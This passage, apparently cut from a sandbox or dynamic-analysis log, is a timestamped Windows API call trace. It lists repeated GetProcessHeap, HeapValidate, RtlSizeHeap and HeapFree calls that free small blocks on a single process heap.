(in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6f38 | out: hHeap=0x4a0000) returned 1 [0176.260] GetProcessHeap () returned 0x4a0000 [0176.260] GetProcessHeap () returned 0x4a0000 [0176.260] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5748) returned 1 [0176.260] GetProcessHeap () returned 0x4a0000 [0176.260] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5748) returned 0x14 [0176.260] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5748 | out: hHeap=0x4a0000) returned 1 [0176.261] GetProcessHeap () returned 0x4a0000 [0176.261] GetProcessHeap () returned 0x4a0000 [0176.261] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5f30) returned 1 [0176.261] GetProcessHeap () returned 0x4a0000 [0176.261] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5f30) returned 0x10 [0176.261] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5f30 | out: hHeap=0x4a0000) returned 1 [0176.261] GetProcessHeap () returned 0x4a0000 [0176.261] GetProcessHeap () returned 0x4a0000 [0176.261] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5728) returned 1 [0176.261] GetProcessHeap () returned 0x4a0000 [0176.261] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5728) returned 0x14 [0176.261] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5728 | out: hHeap=0x4a0000) returned 1 [0176.261] GetProcessHeap () returned 0x4a0000 [0176.261] GetProcessHeap () returned 0x4a0000 [0176.262] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5708) returned 1 [0176.262] GetProcessHeap () returned 0x4a0000 [0176.262] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5708) returned 0x14 [0176.262] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5708 | out: hHeap=0x4a0000) returned 1 [0176.262] GetProcessHeap () returned 0x4a0000 [0176.262] GetProcessHeap () returned 0x4a0000 [0176.262] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b56e8) returned 1 [0176.262] GetProcessHeap () returned 0x4a0000 [0176.262] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b56e8) returned 0x14 [0176.262] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b56e8 | out: hHeap=0x4a0000) returned 1 [0176.262] GetProcessHeap () returned 0x4a0000 [0176.262] GetProcessHeap () returned 0x4a0000 [0176.262] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5f48) returned 1 [0176.262] GetProcessHeap () returned 0x4a0000 [0176.263] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5f48) returned 0xe [0176.263] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5f48 | out: hHeap=0x4a0000) returned 1 [0176.263] GetProcessHeap () returned 0x4a0000 [0176.263] GetProcessHeap () returned 0x4a0000 [0176.263] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b56c8) returned 1 [0176.263] GetProcessHeap () returned 0x4a0000 [0176.263] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b56c8) returned 0x14 [0176.263] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b56c8 | out: hHeap=0x4a0000) returned 1 [0176.263] GetProcessHeap () returned 0x4a0000 [0176.263] GetProcessHeap () returned 0x4a0000 [0176.263] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b56a8) returned 1 [0176.263] GetProcessHeap () returned 0x4a0000 [0176.263] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b56a8) returned 0x12 [0176.264] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b56a8 | out: hHeap=0x4a0000) returned 1 [0176.264] GetProcessHeap () returned 0x4a0000 [0176.264] GetProcessHeap () returned 0x4a0000 [0176.264] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5688) returned 1 [0176.264] GetProcessHeap () returned 0x4a0000 [0176.264] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5688) returned 0x14 [0176.264] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5688 | out: hHeap=0x4a0000) returned 1 [0176.264] GetProcessHeap () returned 0x4a0000 [0176.264] GetProcessHeap () returned 0x4a0000 [0176.264] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5668) returned 1 [0176.268] GetProcessHeap () returned 0x4a0000 [0176.268] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5668) returned 0x12 [0176.268] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5668 | out: hHeap=0x4a0000) returned 1 [0176.268] GetProcessHeap () returned 0x4a0000 [0176.269] GetProcessHeap () returned 0x4a0000 [0176.269] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5648) returned 1 [0176.269] GetProcessHeap () returned 0x4a0000 [0176.269] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5648) returned 0x14 [0176.269] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5648 | out: hHeap=0x4a0000) returned 1 [0176.269] GetProcessHeap () returned 0x4a0000 [0176.269] GetProcessHeap () returned 0x4a0000 [0176.269] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5628) returned 1 [0176.269] GetProcessHeap () returned 0x4a0000 [0176.269] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5628) returned 0x18 [0176.269] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5628 | out: hHeap=0x4a0000) returned 1 [0176.269] GetProcessHeap () returned 0x4a0000 [0176.269] GetProcessHeap () returned 0x4a0000 [0176.269] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5608) returned 1 [0176.269] GetProcessHeap () returned 0x4a0000 [0176.269] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5608) returned 0x14 [0176.270] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5608 | out: hHeap=0x4a0000) returned 1 [0176.270] GetProcessHeap () returned 0x4a0000 [0176.270] GetProcessHeap () returned 0x4a0000 [0176.270] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5f60) returned 1 [0176.270] GetProcessHeap () returned 0x4a0000 [0176.270] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5f60) returned 0xa [0176.270] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5f60 | out: hHeap=0x4a0000) returned 1 [0176.270] GetProcessHeap () returned 0x4a0000 [0176.270] GetProcessHeap () returned 0x4a0000 [0176.270] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b55e8) returned 1 [0176.270] GetProcessHeap () returned 0x4a0000 [0176.270] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b55e8) returned 0x14 [0176.270] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b55e8 | out: hHeap=0x4a0000) returned 1 [0176.270] GetProcessHeap () returned 0x4a0000 [0176.270] GetProcessHeap () returned 0x4a0000 [0176.271] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3fc8) returned 1 [0176.271] GetProcessHeap () returned 0x4a0000 [0176.271] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b3fc8) returned 0x1a [0176.271] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3fc8 | out: hHeap=0x4a0000) returned 1 [0176.271] GetProcessHeap () returned 0x4a0000 [0176.271] GetProcessHeap () returned 0x4a0000 [0176.271] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b55c8) returned 1 [0176.271] GetProcessHeap () returned 0x4a0000 [0176.271] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b55c8) returned 0x14 [0176.271] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b55c8 | out: hHeap=0x4a0000) returned 1 [0176.271] GetProcessHeap () returned 0x4a0000 [0176.271] GetProcessHeap () returned 0x4a0000 [0176.271] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5f78) returned 1 [0176.271] GetProcessHeap () returned 0x4a0000 [0176.271] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5f78) returned 0x10 [0176.271] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5f78 | out: hHeap=0x4a0000) returned 1 [0176.272] GetProcessHeap () returned 0x4a0000 [0176.272] GetProcessHeap () returned 0x4a0000 [0176.272] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b55a8) returned 1 [0176.272] GetProcessHeap () returned 0x4a0000 [0176.272] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b55a8) returned 0x14 [0176.272] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b55a8 | out: hHeap=0x4a0000) returned 1 [0176.272] GetProcessHeap () returned 0x4a0000 [0176.272] GetProcessHeap () returned 0x4a0000 [0176.272] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5f90) returned 1 [0176.272] GetProcessHeap () returned 0x4a0000 [0176.272] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5f90) returned 0x10 [0176.272] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5f90 | out: hHeap=0x4a0000) returned 1 [0176.272] GetProcessHeap () returned 0x4a0000 [0176.272] GetProcessHeap () returned 0x4a0000 [0176.272] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5588) returned 1 [0176.273] GetProcessHeap () returned 0x4a0000 [0176.273] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5588) returned 0x14 [0176.273] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5588 | out: hHeap=0x4a0000) returned 1 [0176.273] GetProcessHeap () returned 0x4a0000 [0176.273] GetProcessHeap () returned 0x4a0000 [0176.273] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5fa8) returned 1 [0176.273] GetProcessHeap () returned 0x4a0000 [0176.273] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5fa8) returned 0x10 [0176.273] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5fa8 | out: hHeap=0x4a0000) returned 1 [0176.273] GetProcessHeap () returned 0x4a0000 [0176.273] GetProcessHeap () returned 0x4a0000 [0176.273] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5568) returned 1 [0176.273] GetProcessHeap () returned 0x4a0000 [0176.273] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5568) returned 0x14 [0176.274] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5568 | out: hHeap=0x4a0000) returned 1 [0176.274] GetProcessHeap () returned 0x4a0000 [0176.274] GetProcessHeap () returned 0x4a0000 [0176.274] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3fa0) returned 1 [0176.274] GetProcessHeap () returned 0x4a0000 [0176.274] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b3fa0) returned 0x1a [0176.274] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3fa0 | out: hHeap=0x4a0000) returned 1 [0176.274] GetProcessHeap () returned 0x4a0000 [0176.274] GetProcessHeap () returned 0x4a0000 [0176.274] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5548) returned 1 [0176.274] GetProcessHeap () returned 0x4a0000 [0176.274] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5548) returned 0x14 [0176.274] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5548 | out: hHeap=0x4a0000) returned 1 [0176.274] GetProcessHeap () returned 0x4a0000 [0176.274] GetProcessHeap () returned 0x4a0000 [0176.274] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5fc0) returned 1 [0176.275] GetProcessHeap () returned 0x4a0000 [0176.275] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5fc0) returned 0xc [0176.275] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5fc0 | out: hHeap=0x4a0000) returned 1 [0176.275] GetProcessHeap () returned 0x4a0000 [0176.275] GetProcessHeap () returned 0x4a0000 [0176.275] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5528) returned 1 [0176.275] GetProcessHeap () returned 0x4a0000 [0176.275] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5528) returned 0x14 [0176.275] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5528 | out: hHeap=0x4a0000) returned 1 [0176.275] GetProcessHeap () returned 0x4a0000 [0176.275] GetProcessHeap () returned 0x4a0000 [0176.275] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5508) returned 1 [0176.275] GetProcessHeap () returned 0x4a0000 [0176.275] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5508) returned 0x18 [0176.276] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5508 | out: hHeap=0x4a0000) returned 1 [0176.276] GetProcessHeap () returned 0x4a0000 [0176.276] GetProcessHeap () returned 0x4a0000 [0176.276] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b54e8) returned 1 [0176.276] GetProcessHeap () returned 0x4a0000 [0176.276] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b54e8) returned 0x14 [0176.276] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b54e8 | out: hHeap=0x4a0000) returned 1 [0176.276] GetProcessHeap () returned 0x4a0000 [0176.276] GetProcessHeap () returned 0x4a0000 [0176.276] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b54c8) returned 1 [0176.276] GetProcessHeap () returned 0x4a0000 [0176.276] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b54c8) returned 0x12 [0176.276] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b54c8 | out: hHeap=0x4a0000) returned 1 [0176.276] GetProcessHeap () returned 0x4a0000 [0176.277] GetProcessHeap () returned 0x4a0000 [0176.277] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b54a8) returned 1 [0176.277] GetProcessHeap () returned 0x4a0000 [0176.277] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b54a8) returned 0x14 [0176.277] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b54a8 | out: hHeap=0x4a0000) returned 1 [0176.277] GetProcessHeap () returned 0x4a0000 [0176.277] GetProcessHeap () returned 0x4a0000 [0176.277] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5fd8) returned 1 [0176.277] GetProcessHeap () returned 0x4a0000 [0176.277] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5fd8) returned 0xe [0176.277] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5fd8 | out: hHeap=0x4a0000) returned 1 [0176.277] GetProcessHeap () returned 0x4a0000 [0176.277] GetProcessHeap () returned 0x4a0000 [0176.277] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5488) returned 1 [0176.277] GetProcessHeap () returned 0x4a0000 [0176.278] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5488) returned 0x14 [0176.278] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5488 | out: hHeap=0x4a0000) returned 1 [0176.278] GetProcessHeap () returned 0x4a0000 [0176.278] GetProcessHeap () returned 0x4a0000 [0176.278] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5468) returned 1 [0176.278] GetProcessHeap () returned 0x4a0000 [0176.278] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5468) returned 0x12 [0176.278] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5468 | out: hHeap=0x4a0000) returned 1 [0176.278] GetProcessHeap () returned 0x4a0000 [0176.278] GetProcessHeap () returned 0x4a0000 [0176.278] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5448) returned 1 [0176.278] GetProcessHeap () returned 0x4a0000 [0176.278] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5448) returned 0x14 [0176.279] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5448 | out: hHeap=0x4a0000) returned 1 [0176.279] GetProcessHeap () returned 0x4a0000 [0176.279] GetProcessHeap () returned 0x4a0000 [0176.279] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5ff0) returned 1 [0176.279] GetProcessHeap () returned 0x4a0000 [0176.279] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5ff0) returned 0x10 [0176.279] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5ff0 | out: hHeap=0x4a0000) returned 1 [0176.279] GetProcessHeap () returned 0x4a0000 [0176.279] GetProcessHeap () returned 0x4a0000 [0176.279] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5428) returned 1 [0176.279] GetProcessHeap () returned 0x4a0000 [0176.279] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5428) returned 0x14 [0176.280] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5428 | out: hHeap=0x4a0000) returned 1 [0176.280] GetProcessHeap () returned 0x4a0000 [0176.280] GetProcessHeap () returned 0x4a0000 [0176.280] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4018) returned 1 [0176.280] GetProcessHeap () returned 0x4a0000 [0176.280] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b4018) returned 0x20 [0176.280] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4018 | out: hHeap=0x4a0000) returned 1 [0176.284] GetProcessHeap () returned 0x4a0000 [0176.284] GetProcessHeap () returned 0x4a0000 [0176.284] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5408) returned 1 [0176.285] GetProcessHeap () returned 0x4a0000 [0176.285] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5408) returned 0x14 [0176.285] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5408 | out: hHeap=0x4a0000) returned 1 [0176.285] GetProcessHeap () returned 0x4a0000 [0176.285] GetProcessHeap () returned 0x4a0000 [0176.285] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6008) returned 1 [0176.285] GetProcessHeap () returned 0x4a0000 [0176.285] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6008) returned 0xe [0176.285] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6008 | out: hHeap=0x4a0000) returned 1 [0176.285] GetProcessHeap () returned 0x4a0000 [0176.285] GetProcessHeap () returned 0x4a0000 [0176.285] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b53e8) returned 1 [0176.285] GetProcessHeap () returned 0x4a0000 [0176.285] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b53e8) returned 0x14 [0176.286] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b53e8 | out: hHeap=0x4a0000) returned 1 [0176.286] GetProcessHeap () returned 0x4a0000 [0176.286] GetProcessHeap () returned 0x4a0000 [0176.286] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5258) returned 1 [0176.286] GetProcessHeap () returned 0x4a0000 [0176.286] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5258) returned 0x8 [0176.286] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5258 | out: hHeap=0x4a0000) returned 1 [0176.286] GetProcessHeap () returned 0x4a0000 [0176.286] GetProcessHeap () returned 0x4a0000 [0176.286] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b66a8) returned 1 [0176.286] GetProcessHeap () returned 0x4a0000 [0176.286] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b66a8) returned 0x14 [0176.286] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b66a8 | out: hHeap=0x4a0000) returned 1 [0176.287] GetProcessHeap () returned 0x4a0000 [0176.287] GetProcessHeap () returned 0x4a0000 [0176.287] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4040) returned 1 [0176.287] GetProcessHeap () returned 0x4a0000 [0176.287] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b4040) returned 0x1a [0176.287] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4040 | out: hHeap=0x4a0000) returned 1 [0176.287] GetProcessHeap () returned 0x4a0000 [0176.287] GetProcessHeap () returned 0x4a0000 [0176.287] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b66c8) returned 1 [0176.287] GetProcessHeap () returned 0x4a0000 [0176.287] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b66c8) returned 0x14 [0176.287] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b66c8 | out: hHeap=0x4a0000) returned 1 [0176.287] GetProcessHeap () returned 0x4a0000 [0176.288] GetProcessHeap () returned 0x4a0000 [0176.288] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6020) returned 1 [0176.288] GetProcessHeap () returned 0x4a0000 [0176.288] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6020) returned 0xa [0176.288] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6020 | out: hHeap=0x4a0000) returned 1 [0176.288] GetProcessHeap () returned 0x4a0000 [0176.288] GetProcessHeap () returned 0x4a0000 [0176.288] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b66e8) returned 1 [0176.288] GetProcessHeap () returned 0x4a0000 [0176.288] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b66e8) returned 0x14 [0176.288] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b66e8 | out: hHeap=0x4a0000) returned 1 [0176.288] GetProcessHeap () returned 0x4a0000 [0176.288] GetProcessHeap () returned 0x4a0000 [0176.288] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6f68) returned 1 [0176.289] GetProcessHeap () returned 0x4a0000 [0176.289] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6f68) returned 0x24 [0176.289] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6f68 | out: hHeap=0x4a0000) returned 1 [0176.289] GetProcessHeap () returned 0x4a0000 [0176.289] GetProcessHeap () returned 0x4a0000 [0176.289] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6708) returned 1 [0176.289] GetProcessHeap () returned 0x4a0000 [0176.289] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6708) returned 0x14 [0176.289] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6708 | out: hHeap=0x4a0000) returned 1 [0176.289] GetProcessHeap () returned 0x4a0000 [0176.289] GetProcessHeap () returned 0x4a0000 [0176.290] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6728) returned 1 [0176.290] GetProcessHeap () returned 0x4a0000 [0176.290] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6728) returned 0x12 [0176.290] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6728 | out: hHeap=0x4a0000) returned 1 [0176.290] GetProcessHeap () returned 0x4a0000 [0176.290] GetProcessHeap () returned 0x4a0000 [0176.290] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6748) returned 1 [0176.290] GetProcessHeap () returned 0x4a0000 [0176.290] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6748) returned 0x14 [0176.290] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6748 | out: hHeap=0x4a0000) returned 1 [0176.290] GetProcessHeap () returned 0x4a0000 [0176.290] GetProcessHeap () returned 0x4a0000 [0176.290] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6768) returned 1 [0176.291] GetProcessHeap () returned 0x4a0000 [0176.291] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6768) returned 0x16 [0176.291] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6768 | out: hHeap=0x4a0000) returned 1 [0176.291] GetProcessHeap () returned 0x4a0000 [0176.291] GetProcessHeap () returned 0x4a0000 [0176.291] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6788) returned 1 [0176.291] GetProcessHeap () returned 0x4a0000 [0176.291] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6788) returned 0x14 [0176.291] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6788 | out: hHeap=0x4a0000) returned 1 [0176.291] GetProcessHeap () returned 0x4a0000 [0176.291] GetProcessHeap () returned 0x4a0000 [0176.291] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6038) returned 1 [0176.292] GetProcessHeap () returned 0x4a0000 [0176.292] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6038) returned 0x10 [0176.292] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6038 | out: hHeap=0x4a0000) returned 1 [0176.292] GetProcessHeap () returned 0x4a0000 [0176.292] GetProcessHeap () returned 0x4a0000 [0176.292] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b67a8) returned 1 [0176.292] GetProcessHeap () returned 0x4a0000 [0176.292] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b67a8) returned 0x14 [0176.292] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b67a8 | out: hHeap=0x4a0000) returned 1 [0176.292] GetProcessHeap () returned 0x4a0000 [0176.292] GetProcessHeap () returned 0x4a0000 [0176.292] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b67c8) returned 1 [0176.293] GetProcessHeap () returned 0x4a0000 [0176.293] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b67c8) returned 0x18 [0176.293] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b67c8 | out: hHeap=0x4a0000) returned 1 [0176.293] GetProcessHeap () returned 0x4a0000 [0176.293] GetProcessHeap () returned 0x4a0000 [0176.293] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b67e8) returned 1 [0176.293] GetProcessHeap () returned 0x4a0000 [0176.293] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b67e8) returned 0x14 [0176.293] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b67e8 | out: hHeap=0x4a0000) returned 1 [0176.293] GetProcessHeap () returned 0x4a0000 [0176.293] GetProcessHeap () returned 0x4a0000 [0176.293] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4068) returned 1 [0176.294] GetProcessHeap () returned 0x4a0000 [0176.294] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b4068) returned 0x1a [0176.294] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4068 | out: hHeap=0x4a0000) returned 1 [0176.294] GetProcessHeap () returned 0x4a0000 [0176.294] GetProcessHeap () returned 0x4a0000 